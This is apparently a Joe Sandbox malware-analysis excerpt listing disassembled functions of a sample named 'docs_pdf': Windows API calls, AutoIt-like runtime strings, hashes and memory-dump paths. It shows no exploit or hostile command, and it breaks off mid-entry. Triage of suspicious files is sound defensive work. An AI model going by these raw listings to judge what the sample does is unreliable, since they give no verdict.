                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: e94fff561531a3e4fe819c8a8c561b1e4235ffd389cb327120ad833bebcc60dd
                                                            • Instruction ID: 00adac0aec2f514aae21188c65ad277eb28ddf287086d66e8a56a313d4f1ebaa
                                                            • Opcode Fuzzy Hash: e94fff561531a3e4fe819c8a8c561b1e4235ffd389cb327120ad833bebcc60dd
                                                            • Instruction Fuzzy Hash: 6EA19D302143059BCB18EF20C991ABAB7F5BF95314F15896CB99A9B6D3DB30EC45CB81
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00165309
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00165314
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0016531F
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 0016532A
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00165335
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00165340
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0016534B
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00165356
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00165361
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0016536C
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00165377
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00165382
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0016538D
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00165398
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 001653A3
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 001653AE
                                                            • GetCursorInfo.USER32(?), ref: 001653BE
                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 001653E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 7e750961182e6ab844fbf3487ae3fee83d1513a893339fba919eff234f55f722
                                                            • Instruction ID: 2d4ad12568443a2137525337f162ce783b14ba5793a3c78f040ec5cd785749da
                                                            • Opcode Fuzzy Hash: 7e750961182e6ab844fbf3487ae3fee83d1513a893339fba919eff234f55f722
                                                            • Instruction Fuzzy Hash: D0415370E043196ADB109FBA8C4996FFFB8EF51B50F10452FA509E7291DBB89441CE61
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0014AAA5
                                                            • __swprintf.LIBCMT ref: 0014AB46
                                                            • _wcscmp.LIBCMT ref: 0014AB59
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0014ABAE
                                                            • _wcscmp.LIBCMT ref: 0014ABEA
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0014AC21
                                                            • GetDlgCtrlID.USER32(?), ref: 0014AC73
                                                            • GetWindowRect.USER32(?,?), ref: 0014ACA9
                                                            • GetParent.USER32(?), ref: 0014ACC7
                                                            • ScreenToClient.USER32(00000000), ref: 0014ACCE
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0014AD48
                                                            • _wcscmp.LIBCMT ref: 0014AD5C
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0014AD82
                                                            • _wcscmp.LIBCMT ref: 0014AD96
                                                              • Part of subcall function 0011386C: _iswctype.LIBCMT ref: 00113874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 41c86c433f2a70b11168f4e2a97cd9212fb9f0ff9d3da84fad2f4f847084641c
                                                            • Instruction ID: 3bef22fcb8c5f9bff9ab56479f1de57ec5449fd0fe1ab7c0b2a0c3372c3f55de
                                                            • Opcode Fuzzy Hash: 41c86c433f2a70b11168f4e2a97cd9212fb9f0ff9d3da84fad2f4f847084641c
                                                            • Instruction Fuzzy Hash: 48A1D171644306AFDB18DF60C884BEAB7E8FF04315F51462DF9A9C25A0D730E996CB92
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0014B3DB
                                                            • _wcscmp.LIBCMT ref: 0014B3EC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0014B414
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0014B431
                                                            • _wcscmp.LIBCMT ref: 0014B44F
                                                            • _wcsstr.LIBCMT ref: 0014B460
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0014B498
                                                            • _wcscmp.LIBCMT ref: 0014B4A8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0014B4CF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0014B518
                                                            • _wcscmp.LIBCMT ref: 0014B528
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0014B550
                                                            • GetWindowRect.USER32(00000004,?), ref: 0014B5B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 5e64fb578707602ada0aae35b2652b674691f5306d6b0174e555fe0ebd321c91
                                                            • Instruction ID: a4a2ffcb27be5c9eb5ecfdf50a700c5cbedf00329f6b257a3b0689e6256ff65c
                                                            • Opcode Fuzzy Hash: 5e64fb578707602ada0aae35b2652b674691f5306d6b0174e555fe0ebd321c91
                                                            • Instruction Fuzzy Hash: 7F818E710083099BDB14DF14C8C5FAABBE8FF54314F088569FD899A0A6DB34DD8ACB61
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: fd21816c460d59a6e9b2e54ef080807b1e9e433f5ddf7efb4773825d867afefa
                                                            • Instruction ID: b42005194b77109cc4b0da320b65cd0ede80e82d5ce30d6dfedbf0ac9b6c8e85
                                                            • Opcode Fuzzy Hash: fd21816c460d59a6e9b2e54ef080807b1e9e433f5ddf7efb4773825d867afefa
                                                            • Instruction Fuzzy Hash: F231D234A08209A6DB18FE60CD83EFE77B8AF25750F600029F515724E7EFA1AE44D552
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 0014C4D4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0014C4E6
                                                            • SetWindowTextW.USER32(?,?), ref: 0014C4FD
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0014C512
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0014C518
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0014C528
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0014C52E
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0014C54F
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0014C569
                                                            • GetWindowRect.USER32(?,?), ref: 0014C572
                                                            • SetWindowTextW.USER32(?,?), ref: 0014C5DD
                                                            • GetDesktopWindow.USER32 ref: 0014C5E3
                                                            • GetWindowRect.USER32(00000000), ref: 0014C5EA
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0014C636
                                                            • GetClientRect.USER32(?,?), ref: 0014C643
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0014C668
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0014C693
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 85cfc375127db7b9033f3121fcda54fccd6f8d9911db09092fd4918f7f0bbfa3
                                                            • Instruction ID: 7fd746838bff29310548895c274754bdc753900a149da1769d389a54e617760e
                                                            • Opcode Fuzzy Hash: 85cfc375127db7b9033f3121fcda54fccd6f8d9911db09092fd4918f7f0bbfa3
                                                            • Instruction Fuzzy Hash: 53515F70A00709AFDB20DFA8DD85B6FBBB5FF04705F00492CE686A65B0D774A985CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0017A4C8
                                                            • DestroyWindow.USER32(?,?), ref: 0017A542
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0017A5BC
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0017A5DE
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017A5F1
                                                            • DestroyWindow.USER32(00000000), ref: 0017A613
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000F0000,00000000), ref: 0017A64A
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017A663
                                                            • GetDesktopWindow.USER32 ref: 0017A67C
                                                            • GetWindowRect.USER32(00000000), ref: 0017A683
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0017A69B
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0017A6B3
                                                              • Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: df29835c9084c1c6eee4d0ee956e055e4eac395721b10fee866c7e8d2ad98d58
                                                            • Instruction ID: 11f309a4618a7641a44dba816f299b3e1b8d29f3832c6595a997c8123106bcaf
                                                            • Opcode Fuzzy Hash: df29835c9084c1c6eee4d0ee956e055e4eac395721b10fee866c7e8d2ad98d58
                                                            • Instruction Fuzzy Hash: 7D718771144205AFD725CF28CC49FAA7BF6EF98700F58852CF989872A1C774E982CB12
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0017C917
                                                              • Part of subcall function 0017ADF1: ClientToScreen.USER32(?,?), ref: 0017AE1A
                                                              • Part of subcall function 0017ADF1: GetWindowRect.USER32(?,?), ref: 0017AE90
                                                              • Part of subcall function 0017ADF1: PtInRect.USER32(?,?,0017C304), ref: 0017AEA0
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0017C980
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0017C98B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0017C9AE
                                                            • _wcscat.LIBCMT ref: 0017C9DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0017C9F5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0017CA0E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0017CA25
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0017CA47
                                                            • DragFinish.SHELL32(?), ref: 0017CA4E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0017CB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 169749273-3440237614
                                                            • Opcode ID: 9ff2a5a928ebfc5d3d1c83c97cf592e3b4f0f62f28071efec01f9ac2d9ba5ec9
                                                            • Instruction ID: cf4a6c8f4dccd555df5a3f5ae5eab2df5cddb9816ee30ef26cce0cb8429fd3e9
                                                            • Opcode Fuzzy Hash: 9ff2a5a928ebfc5d3d1c83c97cf592e3b4f0f62f28071efec01f9ac2d9ba5ec9
                                                            • Instruction Fuzzy Hash: 1C614B71108304AFC701DF64DC85DAFBBF8EF99710F00492DF699961A2DB709A89CB92
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 001746AB
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001746F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 7c29f2111df6182fb412ed45fa542974ecec4b737f4540a9301fe0fdac6b63ad
                                                            • Instruction ID: f302b8c32c6919452fa48e633cb7b22d4afe691f3de7550daa51dee48ce37c80
                                                            • Opcode Fuzzy Hash: 7c29f2111df6182fb412ed45fa542974ecec4b737f4540a9301fe0fdac6b63ad
                                                            • Instruction Fuzzy Hash: DB91A1346083058FCB18EF50C451AAEB7A1BF59314F05846CF99A5B7A3DB70ED4ADB82
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0017BB6E
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00179431), ref: 0017BBCA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0017BC03
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0017BC46
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0017BC7D
                                                            • FreeLibrary.KERNEL32(?), ref: 0017BC89
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0017BC99
                                                            • DestroyIcon.USER32(?,?,?,?,?,00179431), ref: 0017BCA8
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0017BCC5
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0017BCD1
                                                              • Part of subcall function 0011313D: __wcsicmp_l.LIBCMT ref: 001131C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: edbce833c5746b4b43e94134659f78e2803365cb3dca57a1271370974669223b
                                                            • Instruction ID: eecbee17a803bf4e8ec2b28a326bc66bc193570aa8bc4241bc6cadc6e0e68bc4
                                                            • Opcode Fuzzy Hash: edbce833c5746b4b43e94134659f78e2803365cb3dca57a1271370974669223b
                                                            • Instruction Fuzzy Hash: 0361BF71508219BAEB18DF64CC86FFA77B8EF08720F108119F919D61D1DB74AA90DBA0
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • CharLowerBuffW.USER32(?,?), ref: 0015A636
                                                            • GetDriveTypeW.KERNEL32 ref: 0015A683
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A6CB
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A702
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A730
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 5a3b318d8c0b98d43f68379a43fa1465cd7565689983e863797b3dcaa9857ac6
                                                            • Instruction ID: 2e07da960a6cb07a0758d9b4881b27af5aaa41e12a53e34659d1cd82ffbf13e9
                                                            • Opcode Fuzzy Hash: 5a3b318d8c0b98d43f68379a43fa1465cd7565689983e863797b3dcaa9857ac6
                                                            • Instruction Fuzzy Hash: 38517A751043099FC700EF20C9819AAB7F4FF98718F44496DF99A57662DB31AE0ACF92
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0015A47A
                                                            • __swprintf.LIBCMT ref: 0015A49C
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0015A4D9
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0015A4FE
                                                            • _memset.LIBCMT ref: 0015A51D
                                                            • _wcsncpy.LIBCMT ref: 0015A559
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0015A58E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0015A599
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0015A5A2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0015A5AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: c9d8f1f4191421f01502c893782e2d561098a3c29cf4e3c4c553ad666f253f7a
                                                            • Instruction ID: d4c34c7920c1b3325bc4921abc4d22409b7af874e23f97c28ec7d8421ce2a473
                                                            • Opcode Fuzzy Hash: c9d8f1f4191421f01502c893782e2d561098a3c29cf4e3c4c553ad666f253f7a
                                                            • Instruction Fuzzy Hash: 7431B275544219ABDB20DFA0DC48FEB37BCEF88701F5041BAF919D6150E77096858B25
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0015DC7B
                                                            • _wcscat.LIBCMT ref: 0015DC93
                                                            • _wcscat.LIBCMT ref: 0015DCA5
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0015DCBA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015DCCE
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0015DCE6
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0015DD00
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015DD12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 4ca703e64b0a635e837abb92c702241cb81b9527ae4b1a0c10c95f539fc5e3ac
                                                            • Instruction ID: 80c4b8640f0412c0cd55ae14218108a12423c2081967fc23438aae772790a64a
                                                            • Opcode Fuzzy Hash: 4ca703e64b0a635e837abb92c702241cb81b9527ae4b1a0c10c95f539fc5e3ac
                                                            • Instruction Fuzzy Hash: 4281B271504201DFCB34DF64D8419AEB7E9BB89301F15882EFCA9CB251E730D989CB52
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0017C4EC
                                                            • GetFocus.USER32 ref: 0017C4FC
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0017C507
                                                            • _memset.LIBCMT ref: 0017C632
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0017C65D
                                                            • GetMenuItemCount.USER32(?), ref: 0017C67D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0017C690
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0017C6C4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0017C70C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0017C744
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0017C779
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
